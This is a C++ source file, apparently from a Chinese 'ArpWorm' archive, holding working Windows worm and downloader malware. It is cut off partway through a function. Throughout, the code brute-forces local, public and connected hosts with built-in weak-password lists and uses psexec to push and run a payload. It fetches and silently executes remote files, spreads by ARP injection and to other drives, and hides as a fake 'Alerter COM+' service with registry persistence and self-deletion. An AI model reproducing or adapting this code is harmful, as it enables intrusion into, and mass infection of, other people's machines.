ArpWorm.rar WebDown.cpp

www.pudn.com > ArpWorm.rar > WebDown.cpp
// WebDown.cpp : Defines the entry point for the console application. 
#include "stdafx.h" 
#include "WebDown.h" 
#include "wrom.h" 
#include "win32cpp.h" 
//#include "ipc.h" 
#include  
#include "winsvc.h" 
 
#include "winsvc.h" 
 
#include "winsock2.h" 
#pragma comment(lib,"ws2_32.lib") 
 
#include "PingI.h" 
#include "winnetwk.h" 
#pragma comment(lib,"mpr.lib") 
 
#include  
 
//#include "afxinet.h" 
 
#include  
 
const char *user[]={ 
"administrator","admin", "guest","alex", "home", 
"love","xp", "user","game", "123", 
"movie","time", "yeah","money", "xpuser", 
0}; 
const char *pass[]={ 
"NULL",  
"password", "123456","qwerty","abc123", "memory", 
"home", "12345678","love","xp", "88888", 
"5201314", "1314520","asdfgh","alex", "angel", 
"123", "asdf","baby","woaini", "movie", 
0}; 
 
 
 
///////////////////////////////////////////////////////////////////////////// 
struct MODIFY_DATA  
{ 
	char DownFile[100];//下载文件列表 
	char DownRunFile[100]; //下载ip和服务端程序执行 
	char DownRunURLFile[100]; //下载ip和服务端程序执行 
	char ArpInject[256];  //Arp感染挂马代码 
	char DownRunArpFile[100]; //下载Arp URL 
	char DownRunBindFile[100]; //文件捆绑下载 URL 
	bool IsWorm;//是否感染EXE启动 
	bool IsUpan;//是否u盘传播 
	bool IsShare;//是否弱口令传播 
	bool IsAnti;//是否反查杀 
	bool IsARP; //是否ARP感染 
	int WaitTime;//巡查时间（分钟） 
}modify_data =  
{ 
	"http://127.0.0.1/down.list", 
	"http://127.0.0.1/", 
    "http://127.0.0.1/", 
	"", 
	"http://127.0.0.1/", 
	"http://127.0.0.1/", 
	false, 
	false, 
	false, 
	false, 
	false, 
    20, 
}; 
 
HWND hWnd; 
char DownFileDate1[9]="88-88-88"; 
char DownFileDate2[9]="88-88-88"; 
 
SERVICE_STATUS service_status_ss; 
SERVICE_STATUS_HANDLE handle_service_status; 
SC_HANDLE scm,svc; 
 
//====================================== 
typedef DWORD (WINAPI *GetTcpTableFun)(PMIB_TCPTABLE,PDWORD,BOOL); 
typedef DWORD (WINAPI *SetTcpEntryFun) (PMIB_TCPROW ); 
typedef DWORD (WINAPI *GetUdpTableFun)(PMIB_UDPTABLE,PDWORD,BOOL); 
 
	PMIB_TCPTABLE mibtcp; //TCP 
	PMIB_UDPTABLE mibUdp; //UDP 
	BYTE	pTcpBuf[100*20+4]; 
	char    *DisConIPAddr[10]; 
	int     iDisCon; 
 
	HINSTANCE hInst; 
	GetTcpTableFun pGetTcp; 
	GetUdpTableFun pGetUdp; 
	SetTcpEntryFun pEtyTcp; 
 
//======================================== 
 
/*解密数据函数*/ 
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey) 
{ 
	unsigned long i; 
	char *p; 
 
	p = szKey; 
 
	for(i = 0; i < nLen; i++) { 
		if(!(*p)) 
			p = szKey; 
 
		*szRec -= *p; 
		*szRec++ ^= *p++; 
	} 
} 
 
 
//==================================================================== 
void KillProcess(char * processName) 
{ 
	HANDLE   hSnapshot;     
	hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);   
	PROCESSENTRY32   pe;     
	Process32First(hSnapshot,&pe);     
	do     
	{    CString KillProcessName = processName; 
        if(KillProcessName.CompareNoCase(pe.szExeFile) == 0) 
		{     
			HANDLE   hProcess;     
			hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);     
			if   (hProcess)     
			{     
				TerminateProcess(hProcess,0);//关闭进程     
			}     
		}     
	}       
	while(Process32Next(hSnapshot,&pe));     
	CloseHandle(hSnapshot);  
} 
 
 
DWORD ConnectRemote(const char *RemoteIP,const char *lpUserName,const char *lpPassword)  
{ 
   char sDownRunFileUP[256], sDownRunFileServer[256], char sPwd[20]; 
   memset(sDownRunFileUP, 0, 256); 
   memset(sDownRunFileServer, 0, 256); 
   sprintf(sDownRunFileUP, "%s", modify_data.DownRunFile); 
   sprintf(sDownRunFileServer, "%s", modify_data.DownRunURLFile); 
 
	char SysDirBuff[256], File1[256], File2[256]; 
	memset(File1, 0, 256); 
	memset(File2, 0, 256); 
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff)); 
	sprintf(File1, "%s\\psexec.exe", SysDirBuff); 
	sprintf(File2, "%s\\servrr.exe", SysDirBuff); 
 
	URLDownloadToFile(0, sDownRunFileUP, File1, 0, 0); 
    URLDownloadToFile(0, sDownRunFileServer, File2, 0, 0); 
 
   memset(sPwd, 0, 20); 
   if(strcmp(lpPassword, "NULL") == 0) 
	   sprintf(sPwd, "\"%s\"", ""); 
   else 
	   sprintf(sPwd, "%s", lpPassword); 
					 
   char filesring[2048]; 
   memset(filesring, 0, 2048); 
   sprintf(filesring, "%s\\psexec.exe \\\\%s -u %s -p %s -c %s\\servrr.exe -d", SysDirBuff, RemoteIP, lpUserName, sPwd, SysDirBuff); 
   Sleep(1000); 
   int  nRet = WinExec(filesring, SW_HIDE); 
   return nRet; 
} 
 
CString jian2(CString ch) 
{ 
    CString aaa; 
	int nCount = 0; 
      for(int i=0;i<ch.GetLength();i++) 
	{ 
		  if(ch.Mid(i,1)=='.') 
		  { 
			  nCount ++; 
			  if(nCount == 2) 
			  { 
				  aaa = ch.Left(i + 1);   
			  } 
		  } 
 
	} 
	 
	  return(aaa); 
	   
} 
 
CString jian(CString ch) 
{ 
    CString aaa; 
      for(int i=0;i<ch.GetLength();i++) 
	{ 
		  if(ch.Mid(i,1)=='0'||ch.Mid(i,1)=='1'||ch.Mid(i,1)=='2'||ch.Mid(i,1)=='3'||ch.Mid(i,1)=='4'||ch.Mid(i,1)=='5'||ch.Mid(i,1)=='6'||ch.Mid(i,1)=='7'||ch.Mid(i,1)=='8'||ch.Mid(i,1)=='9'||ch.Mid(i,1)=='.') 
          aaa+=ch.Mid(i,1); 
		 // else 
		 // break; 
	} 
	 
	  return(aaa); 
	   
} 
 
 
CString jian1(CString ch) 
{ 
    CString aaa = ch.Right(3); 
      for(int i=0;i<aaa.GetLength();i++) 
	{ 
		  if(aaa.Mid(i,1)=='.') 
		  { 
			  aaa = aaa.Right(3 - (i + 1)); 
			  break; 
		  } 
           
	} 
 
	  CString bbb = ch.Left(ch.GetLength() - aaa.GetLength());     
 
	  return(bbb); 
	   
} 
 
 
 
//取得公网IP 
void getipfun() 
{ 
    CInternetSession session;         //声明该对象为获取网页属性做准备 
	CHttpFile *pFile=NULL;             
	CString str,ch;  //www.ip138.com/ips8.asp 
	CString m_szSite="http://union.itlearner.com/ip/getip.asp";   //该地址是获取外网IP的关键，原理就是通过该地址来获取外网IP的 
	try{ 
		pFile=(CHttpFile*)session.OpenURL(m_szSite);}      //打开该地址 
	catch(CInternetException *pEx)             //错误处理 
	{ 
		pFile=NULL; 
		pEx->Delete(); 
	} 
	if(pFile) 
	{ 
            while(pFile->ReadString(str))    //读入该字符串 
			{ 
               ch+=str+"\r\n"; 
			} 
	pFile->Close();                                
	delete pFile; 
	} 
	else 
	{ 
		ch+=""; 
	} 
	CString lin; 
	CString aaaa; 
	lin=ch.Mid(ch.Find("input name=\"ip\"")+2,50);        //处理获取的带有IP的字符串 
	lin=lin.Mid(lin.Find(".") - 3,15);        //处理获取的带有IP的字符串 
	lin=jian(lin);                          //再次处理带有IP的字符串 
 
    CString bbb = jian2(lin); 
	CString cccccc; 
	for(int j = 90; j < 255; j ++) 
	{ 
	   for(int n = 2; n < 255; n ++) 
	   { 
			cccccc.Empty();  
			cccccc.Format("%s%d.%d", bbb, j, n);  
			if(cccccc.CompareNoCase(lin) != 0) 
			{ 
				for(int mm = 0;user[mm]; mm++) 
				{ 
					for (int k=0;pass[k];k++) 
					{ 
						ConnectRemote(cccccc, user[mm], pass[k]); 
					} 
				}			 
 
			} 
 
	   } 
	    
 
	} 
 
} 
 
//================================================================================== 
DWORD ArpRemote(const char *RemoteIP)  
{ 
	char SysDirBuff[256], ArpFile[256], strDownRunArpFile[256], strDownRunWincap[256], 
		strWpCapDll[256], strPaketdll[256], strwanpacketdll[256], 
		DownRunWincap[256],	WpCapDll[256], Paketdll[256], wanpacketdll[256]; 
	memset(ArpFile, 0, 256); 
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff)); 
	sprintf(ArpFile, "%s\\ArpW.exe", SysDirBuff); 
	memset(strDownRunArpFile, 0, 256); 
	memset(strDownRunWincap, 0, 256); 
	memset(strWpCapDll, 0, 256); 
	memset(strPaketdll, 0, 256); 
	memset(strwanpacketdll, 0, 256); 
 
	memset(DownRunWincap, 0, 256); 
	memset(WpCapDll, 0, 256); 
	memset(Paketdll, 0, 256); 
	memset(wanpacketdll, 0, 256); 
	sprintf(DownRunWincap, "%s\\nogui.exe", SysDirBuff); 
	sprintf(WpCapDll, "%s\\wpcap.dll", SysDirBuff); 
	sprintf(Paketdll, "%s\\packet.dll", SysDirBuff); 
	sprintf(wanpacketdll, "%s\\wanpacket.dll", SysDirBuff); 
 
	sprintf(strDownRunArpFile, "%s/arp.exe", modify_data.DownRunArpFile); 
	sprintf(strDownRunWincap, "%s/nogui.exe", modify_data.DownRunArpFile); 
	sprintf(strWpCapDll, "%s/wpcap.dll", modify_data.DownRunArpFile); 
	sprintf(strPaketdll, "%s/packet.dll", modify_data.DownRunArpFile); 
	sprintf(strwanpacketdll, "%s/wanpacket.dll", modify_data.DownRunArpFile); 
 
	URLDownloadToFile(0, strDownRunArpFile, ArpFile, 0, 0); 
	URLDownloadToFile(0, strDownRunWincap, DownRunWincap, 0, 0); 
	URLDownloadToFile(0, strWpCapDll, WpCapDll, 0, 0); 
	URLDownloadToFile(0, strPaketdll, Paketdll, 0, 0); 
	URLDownloadToFile(0, strwanpacketdll, wanpacketdll, 0, 0); 
	    
   char filesring[2048]; 
   memset(filesring, 0, 2048); 
   //运行wincap 
   WinExec(DownRunWincap, SW_HIDE); 
 
   Sleep(50000); 
 
   memset(filesring, 0, 2048); 
   sprintf(filesring, "%s\\ArpW.exe -idx 0 -ip %s -port 80 -insert \"%s\"", SysDirBuff, RemoteIP, modify_data.ArpInject); 
   WinExec(filesring, SW_HIDE); 
   return 0; 
} 
 
void LocalToArp()  
{  
	WORD wVersion =0 ; 
	int	 errret = -1; 
	WSADATA wsaData; 
	 
	wVersion = MAKEWORD(2,2); 
	errret = WSAStartup(wVersion,&wsaData); 
	 
	if( LOBYTE( wsaData.wVersion) != 2 || 
		HIBYTE( wsaData.wVersion) !=2 ) 
	{ 
  		return ; 
	} 
	 
	char szHostName[128];      //将本机的名称存入一维数组,数组名称为szHostName 
	struct hostent * pHost;	//定义结构体 hostent 
	int i; 	                //定义变量i 
	char IPStr[100]; 
   
    LVITEM lvi; 
	lvi.mask=LVIF_IMAGE|LVIF_TEXT; 
	 
	lvi.iItem=0; 
	lvi.iSubItem=0; 
	lvi.iImage=0; 
 
	if(gethostname(szHostName,128)==0)     
	{ 
		pHost = gethostbyname(szHostName);  
		for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ ) 	 
		{ 
			CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]); 
 
			CString cccc = jian1(IPAddress); 
			 
			memset(IPStr, 0, 100); 
 
			sprintf(IPStr, "%s2-%s255", cccc, cccc); 
 
            ArpRemote(IPStr); 
		} 
	} 
 
	WSACleanup(); 
} 
 
unsigned long  CALLBACK ARP_thread(LPVOID dParam)  
{ 
  
  
	LocalToArp(); 
  
 
	return 0; 
} 
 
//捆绑感染 
DWORD DownBindRun()  
{ 
	char SysDirBuff[256], ArpFile[256]; 
	memset(ArpFile, 0, 256); 
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff)); 
	sprintf(ArpFile, "%s\\BindF.exe", SysDirBuff); 
 
	URLDownloadToFile(0, modify_data.DownRunBindFile, ArpFile, 0, 0); 
	    
   int nRet = WinExec(ArpFile, SW_HIDE); 
   return 0; 
} 
 
unsigned long  CALLBACK Bind_thread(LPVOID dParam)  
{ 
	DownBindRun(); 
 
	return 0; 
} 
 
//================================================================================== 
 
/*   功能说明：查询本机的名称和IP地址.                                             */  
void QueryLocalIP()  
{  
	WORD wVersion =0 ; 
	int	 errret = -1; 
	WSADATA wsaData; 
	 
	wVersion = MAKEWORD(2,2); 
	errret = WSAStartup(wVersion,&wsaData); 
	 
	if( LOBYTE( wsaData.wVersion) != 2 || 
		HIBYTE( wsaData.wVersion) !=2 ) 
	{ 
  		return ; 
	} 
	 
	char szHostName[128];      //将本机的名称存入一维数组,数组名称为szHostName 
	struct hostent * pHost;	//定义结构体 hostent 
	int i; 	                //定义变量i 
   
    LVITEM lvi; 
	lvi.mask=LVIF_IMAGE|LVIF_TEXT; 
	 
	lvi.iItem=0; 
	lvi.iSubItem=0; 
	lvi.iImage=0; 
 
	if(gethostname(szHostName,128)==0)    //如果本机的名称查到，则将其名称送入List控件 
	{ 
		pHost = gethostbyname(szHostName);  
		for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ ) 	 
		{ 
			CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]); 
 
			CString cccc = jian1(IPAddress); 
			for(int j = 2; j < 255; j ++) 
			{ 
				CString ddd; 
				ddd.Format("%s%d", cccc, j); 
				if(ddd.CompareNoCase(IPAddress) != 0) 
				{ 
					for(int mm = 0;user[mm]; mm++) 
					{ 
						for (int k=0;pass[k];k++) 
						{ 
							ConnectRemote(ddd, user[mm], pass[k]); 
						} 
					}			 
 
				} 
			} 
		} 
	} 
 
	WSACleanup(); 
} 
 
int TCPConnect() 
{ 
		pGetTcp=NULL; 
		pGetUdp=NULL; 
		pEtyTcp=NULL; 
		hInst=NULL; 
 
		HINSTANCE hInst = LoadLibrary("iphlpapi.dll");  
		if(hInst==NULL) return FALSE; 
 
		pGetTcp = (GetTcpTableFun)GetProcAddress(hInst, "GetTcpTable"); 
		if(pGetTcp==NULL)  
		{ 
			if (hInst!=NULL) FreeLibrary(hInst); 
 
 			return FALSE; 
		}  
		pGetUdp=(GetUdpTableFun)GetProcAddress(hInst,"GetUdpTable"); 
		if(pGetUdp==NULL) 
		{ 
			if (hInst!=NULL) FreeLibrary(hInst); 
			return FALSE; 
		} 
 
		pEtyTcp=(SetTcpEntryFun)GetProcAddress(hInst,"SetTcpEntry"); 
		if(pEtyTcp==NULL) 
		{ 
			if (hInst!=NULL) FreeLibrary(hInst); 
			return FALSE; 
		} 
 
		if(pGetTcp==NULL ||pGetUdp==NULL) 
		{ 
			if (hInst!=NULL) FreeLibrary(hInst); 
			return 0; 
		} 
		//netstat 方式感染 
		CString strStatus,strTmp;  
  
		BYTE pUdpBuf[100*8+4]; 
		DWORD   dwTableSize; 
		DWORD  lret; 
		int i,k=0; 
		in_addr	addrLoc,addrRem; 
		char szLocAddr[100],szRemAddr[100]; 
		DWORD dwLocIP,dwRemIP; 
		unsigned short nLocalPort,nRemotePort; 
 
  
		dwTableSize=100*20+4; 
		lret=pGetTcp((PMIB_TCPTABLE)pTcpBuf,&dwTableSize,FALSE); 
		if (lret != NO_ERROR) 
		{ 
			if (hInst!=NULL) FreeLibrary(hInst); 
			return 0; 
		} 
		mibtcp=(PMIB_TCPTABLE)pTcpBuf; 
		k=(int)mibtcp->dwNumEntries-1; 
  
		for(i=0;i<k;i++){ 
 
			dwRemIP=htonl(mibtcp->table[i].dwRemoteAddr); 
			addrRem.S_un.S_addr = ntohl(dwRemIP); 
			strcpy(szRemAddr, inet_ntoa(addrRem)); 
			//判断是否本地IP 
			if(strcmp(szRemAddr, "0.0.0.0") != 0 && strcmp(szRemAddr, "127.0.0.1") != 0) 
			{//用户名和密码枚举连接 
				for(int mm = 0;user[mm]; mm++) 
				{ 
					for (int j=0;pass[j];j++) 
					{ 
						ConnectRemote(szRemAddr, user[mm], pass[j]); 
					} 
				}			 
			} 
			 
 
	  } 
	  if (hInst!=NULL) FreeLibrary(hInst);	 
	  return 0; 
 
} 
 
unsigned long  CALLBACK TCP_thread(LPVOID dParam)  
{ 
 
 
	while(1) 
	{ 
		//内网IP 
		QueryLocalIP(); 
		//外网	 
		getipfun(); 
		//netstat  
		TCPConnect(); 
 
		Sleep(20*60000); 
	} 
 
	 
 
	return 0; 
} 
 
unsigned long  CALLBACK DOWN_thread(LPVOID dParam)  
{ 
 
 
	while(1) 
	{ 
		//内网IP 
		DownExec(modify_data.DownFile); 
 
		Sleep(modify_data.WaitTime*60*1000); 
	} 
 
	 
 
	return 0; 
} 
 
unsigned long  CALLBACK IPC_thread(LPVOID dParam) 
{ 
	WORD wVersion =0 ; 
	int	 errret = -1; 
	WSADATA wsaData; 
	 
	wVersion = MAKEWORD(2,2); 
	errret = WSAStartup(wVersion,&wsaData); 
	 
	if( LOBYTE( wsaData.wVersion) != 2 || 
		HIBYTE( wsaData.wVersion) !=2 ) 
	{ 
  //	MessageBox(NULL,"winsocket库版本低","提示",MB_OK); 
		return FALSE; 
	} 
 
    /*获取计算机名称*/ 
	CHAR szHostName[128]={0};      //将本机的名称存入一维数组,数组名称为szHostName 
	struct hostent * pHost;	//定义结构体 hostent 
 
	int i; //定义变量i 
	 
	SOCKADDR_IN saddr; 
	 
	if(gethostname(szHostName,128)==0)    //如果本机的名称查到， 
	{		 
		pHost = gethostbyname(szHostName);  
		for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ ) 	 
		{ 
 
			memset(&saddr,0,sizeof(saddr));  
			memcpy(&saddr.sin_addr.s_addr, pHost->h_addr_list[i], pHost->h_length);			 
 
		} 
	}	 
 
	char ip[128]; 
    int count; 
 
	BOOL bpingOK=FALSE; 
		 
	for(count=1;count<254;count++) 
	{ 
		memset(ip,0,128); 
		sprintf(ip, 
			"%d.%d.%d.%d", 
			saddr.sin_addr.S_un.S_un_b.s_b1, 
			saddr.sin_addr.S_un.S_un_b.s_b2, 
			saddr.sin_addr.S_un.S_un_b.s_b3, 
			count); 
		CPingI m_PingI; 
		bpingOK = m_PingI.Ping(2,(LPCSTR)ip,NULL); 
		if (bpingOK) 
		{//用户名和密码枚举连接 
			for(int i = 0;user[i]; i++) 
			{ 
				for (int j=0;pass[j];j++) 
				{ 
					if (ConnectRemote(ip,user[i],pass[j])==0) 
						break; 
				} 
			}			 
		} 
			 
	} 
 
	WSACleanup(); 
	//printf("Hello World!\n"); 
	return 0; 
} 
 
 
 
 
//===================================================================== 
 
 
//***********************************************//自删除 
void uninstall(void)//Thanks to Spybot 
{ 
	char batfile[MAX_PATH];  
	char tempdir[MAX_PATH];  
	char tcmdline[MAX_PATH]; 
	char cmdline[MAX_PATH]; 
	char This_File[MAX_PATH]; 
	HANDLE f; 
	DWORD r; 
	PROCESS_INFORMATION pinfo; 
	STARTUPINFO sinfo; 
	GetTempPath(sizeof(tempdir), tempdir); 
	sprintf(batfile, "%s\\rs.bat", tempdir); 
	f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 
	if (f != INVALID_HANDLE_VALUE)  
	{ 
		// write a batch file to remove our executable once we close 
		WriteFile(f, "@echo off\r\n" 
					 ":start\r\nif not exist \"\"%1\"\" goto done\r\n" 
					 "del /F \"\"%1\"\"\r\n" 
					 "del \"\"%1\"\"\r\n" 
					 "goto start\r\n" 
					 ":done\r\n" 
					 "del /F %temp%\rs.bat\r\n" 
					 "del %temp%\r.bat\r\n", 105, &r, NULL); 
		CloseHandle(f); 
 
		memset(&sinfo, 0, sizeof(STARTUPINFO)); 
		sinfo.cb = sizeof(sinfo); 
		sinfo.wShowWindow = SW_HIDE; 
		memset(This_File,0,sizeof(This_File)); 
		GetModuleFileName(NULL, This_File, sizeof(This_File)); 
		sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line 
		ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line 
 
		// execute the batch file 
		CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo); 
	} 
} 
 
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) 
{ 
	int nRetCode = 0;  
 
	///自复制---------------------- 
	char SysDirBuff[256]; 
	char filename[256]; 
	char This_File[256]; 
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff)); 
	strcpy(filename,SysDirBuff); 
	strcat(filename,"\\IME\\svchost.exe");  
	GetModuleFileName(NULL, This_File, sizeof(This_File)); 
	 
	if (_stricmp(This_File,filename)!=0) 
	{ 
		DeleteFile(filename); 
		if(::CopyFile(This_File,filename,FALSE)==0)	return -1; 
		SetFileAttrib(filename);//隐藏了则不能拷贝？？ 
		PROCESS_INFORMATION pinfo; 
		STARTUPINFO sinfo;		 
		memset(&pinfo,0,sizeof(pinfo)); 
		memset(&sinfo,0,sizeof(sinfo));	 
		CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo); 
		uninstall(); 
		ExitProcess(0); 
	} 
 
	//注释解密部分 
	DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314"); 
	 
	//服务入口表----------------------------------- 
	SERVICE_TABLE_ENTRY	service_tab_entry[2]; 
	service_tab_entry[0].lpServiceName="Alerter COM+";	//线程名字 
	service_tab_entry[0].lpServiceProc=ServiceMain;	//线程入口地址 
	//可以有多个线程，最后一个必须为NULL 
	service_tab_entry[1].lpServiceName=NULL; 
	service_tab_entry[1].lpServiceProc=NULL; 
		   	 
	if (StartServiceCtrlDispatcher(service_tab_entry)==0)//首次运行 
	{ 
		InstallService(); 
	} 
		 
	return nRetCode; 
} 
 
/***********************************************/ 
//服务的真正入口点函数 
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv) 
{ 
	service_status_ss.dwServiceType=SERVICE_WIN32; 
	service_status_ss.dwCurrentState=SERVICE_START_PENDING; 
	service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE; 
	service_status_ss.dwServiceSpecificExitCode=0; 
	service_status_ss.dwWaitHint=0; 
	service_status_ss.dwCheckPoint=0; 
	service_status_ss.dwWin32ExitCode=0; 
	if ((handle_service_status=RegisterServiceCtrlHandler("Alerter COM+",Handler))==0) 
	{ 
		//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK); 
	}//一个服务对应一个控制处理器 
	service_status_ss.dwCurrentState=SERVICE_RUNNING; 
	service_status_ss.dwWaitHint=0; 
	service_status_ss.dwCheckPoint=0; 
	::SetServiceStatus(handle_service_status,&service_status_ss); 
 
	//创建互斥量----------------------------------- 
	HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Alerter COM+"); 
	//检查错误代码 
	if(GetLastError()==ERROR_ALREADY_EXISTS) 
	{ 
		//如果已有互斥量存在则释放句柄并复位互斥量 
		CloseHandle(m_hMutex); 
		m_hMutex=NULL; 
		//退出程序 
		ExitProcess(0); 
	} 
	 
	//开启感染线程，实施感染启动---------------------------- 
	if (modify_data.IsWorm)// 
	{  
		::CreateThread(NULL,0,Bind_thread,NULL,0,NULL); 
	} 
	//开启Arp感染 
	if (modify_data.IsARP)// 
	{  
		::CreateThread(NULL,0,ARP_thread,NULL,0,NULL); 
	} 
 
	//开启IPC共享传播--------------------------------------- 
	if (modify_data.IsShare)// 
	{  
		::CreateThread(NULL,0,TCP_thread,NULL,0,NULL); 
	} 
 
	::CreateThread(NULL,0,DOWN_thread,NULL,0,NULL); 
 
	//拷贝文件到各盘 
	if(modify_data.IsUpan) 
	{//搜索从C到Z各个盘符，感染每个磁盘。 
		for (char cLabel='c'; cLabel<='z'; cLabel++) 
		{ 
			char strRootPath[] = {"c:\\"}; 
			strRootPath[0] = cLabel; 
			if(GetDriveType(strRootPath)== DRIVE_FIXED) 
			{ 
				CopyToUAndSet(strRootPath); 
			} 
		} 
	} 
 
     
 
	CreateMyWindow(); 
	return ; 
} 
/***********************************************/ 
//服务控制器 
void WINAPI Handler(DWORD dwControl) 
{ 
		switch(dwControl) 
		{ 
			case SERVICE_CONTROL_STOP: 
				service_status_ss.dwCurrentState=SERVICE_STOPPED; 
				::SetServiceStatus(handle_service_status,&service_status_ss); 
				break; 
			case SERVICE_CONTROL_CONTINUE: 
				service_status_ss.dwCurrentState=SERVICE_RUNNING; 
				::SetServiceStatus(handle_service_status,&service_status_ss); 
				break; 
			case SERVICE_CONTROL_PAUSE: 
				service_status_ss.dwCurrentState=SERVICE_PAUSED; 
				::SetServiceStatus(handle_service_status,&service_status_ss); 
				break; 
			case SERVICE_CONTROL_INTERROGATE: 
                  break; 
				 
		} 
		::SetServiceStatus(handle_service_status,&service_status_ss); 
 
} 
 
/***********************************************/ 
bool InstallService() 
{ 
	DWORD            dwErrorCode; 
 
	char szSysDir[256]; 
	memset(szSysDir,0,sizeof(szSysDir)); 
	::GetSystemDirectory(szSysDir,sizeof(szSysDir)); 
	strcat(szSysDir,"\\IME\\svchost.exe"); 
 
	scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库 
	if (scm!=NULL) 
	{ 
		svc=::CreateService(scm,"Alerter COM+","Alerter COM+",SERVICE_ALL_ACCESS, 
				SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS, 
				SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szSysDir,NULL,NULL,NULL,NULL,NULL); 
 
		svc=::OpenService(scm,"Alerter COM+",SERVICE_START); 
		if (svc!=NULL) 
		{ 
			if(StartService(svc,0,NULL)==0)//已经存在该服务,就启动服务                         
			{ 
				dwErrorCode=GetLastError(); 
				if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING) 
				{ 
					CloseServiceHandle(scm);   
					CloseServiceHandle(svc); 
					return true; 
				} 
			} 
			while(QueryServiceStatus(svc,&service_status_ss)!=0)            
			{ 
				if(service_status_ss.dwCurrentState==SERVICE_START_PENDING) 
				{ 
					Sleep(100); 
				} 
				else 
				{ 
					break; 
				} 
			} 
			CloseServiceHandle(svc); 
		} 
		CloseServiceHandle(scm); 
	} 
	else 
		return false; 
 
	return true; 
} 
/************************************************/ 
/************************************************/ 
int CreateMyWindow() 
{ 
	MSG msg; 
	WNDCLASS wndc; 
	LPSTR szAppName="WebDown"; 
	wndc.style=0; 
	wndc.lpfnWndProc=WndProc; 
	wndc.cbClsExtra=0; 
	wndc.cbWndExtra=0; 
	wndc.hInstance=NULL; 
	wndc.hIcon=NULL; 
	wndc.hCursor=NULL; 
	wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1); 
	wndc.lpszMenuName=NULL; 
	wndc.lpszClassName=szAppName; 
	RegisterClass(&wndc); 
	hWnd=CreateWindow(szAppName,"Alerter COM+", 
	WS_OVERLAPPEDWINDOW, 
	CW_USEDEFAULT,CW_USEDEFAULT, 
	CW_USEDEFAULT,CW_USEDEFAULT, 
	NULL,NULL,NULL,NULL); 
	ShowWindow(hWnd,SW_HIDE); 
	UpdateWindow(hWnd); 
 
	SendMessage(hWnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息 
	 
	while(GetMessage(&msg,NULL,0,0)) 
	{ 
			TranslateMessage(&msg); 
			DispatchMessage(&msg); 
	} 
	return 1; 
} 
 
BOOL Register() 
{ 
	long  ret = 0; 
	HKEY  hKEY; 
	char  chCurPath[MAX_PATH]; 
	char  chSysPath[MAX_PATH]; 
	char  lpNewFileName1[MAX_PATH]; 
	char  lpNewFileName2[MAX_PATH]; 
	LPSTR lpCurFileName; 
	DWORD dwType = REG_SZ; 
	DWORD dwSize = MAX_PATH; 
	char lpRegPath[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; 
 
	::GetSystemDirectory(chSysPath, dwSize); 
	::GetModuleFileName(NULL, chCurPath, dwSize); 
	 
	//拷贝文件 
	lpCurFileName = chCurPath; 
	sprintf(lpNewFileName1, "%s\\internt.exe", chSysPath); 
	SetFileAttrib(chSysPath); 
	ret = CopyFile(lpCurFileName, lpNewFileName1, FALSE); 
	sprintf(lpNewFileName2, "%s\\progmon.exe", chSysPath); 
	SetFileAttrib(chSysPath); 
	ret = CopyFile(lpCurFileName, lpNewFileName2, FALSE); 
	//打开注册表键值 
	ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRegPath, 0, KEY_WRITE, &hKEY); 
	if(ret != ERROR_SUCCESS) 
	{  
		RegCloseKey(hKEY); 
		return FALSE; 
	} 
 
	//设置注册表键值 
	ret = RegSetValueEx(hKEY, "Internt", NULL, dwType,  
		(const unsigned char*)lpNewFileName1, dwSize); 
 
	ret = RegSetValueEx(hKEY, "Program file", NULL, dwType,  
		(const unsigned char*)lpNewFileName2, dwSize); 
 
	RegCloseKey(hKEY); 
 
	//----------------------- 
	DWORD dwData=0x00000000; 
	char lpRegPath2[256] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"; 
	ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,lpRegPath2,0,KEY_READ|KEY_WRITE,&hKEY); 
	if(ret != ERROR_SUCCESS) 
	{  
		RegCloseKey(hKEY); 
		return FALSE; 
	}	 
	RegSetValueEx(hKEY,"CheckedValue",0,REG_DWORD,(LPBYTE)&dwData,sizeof(DWORD)); 
	RegCloseKey(hKEY); 
 
	return TRUE; 
} 
 
 
///************************************************ 
bool GetDownFileDate(char Url[],char Date[]) 
{ 
	HMODULE hDll; 
	LPVOID hInternet,hUrlHandle;  
	char buf[9]; 
	DWORD dwFlags; 
	 
	hDll = LoadLibrary("wininet.dll"); 
	if(hDll) 
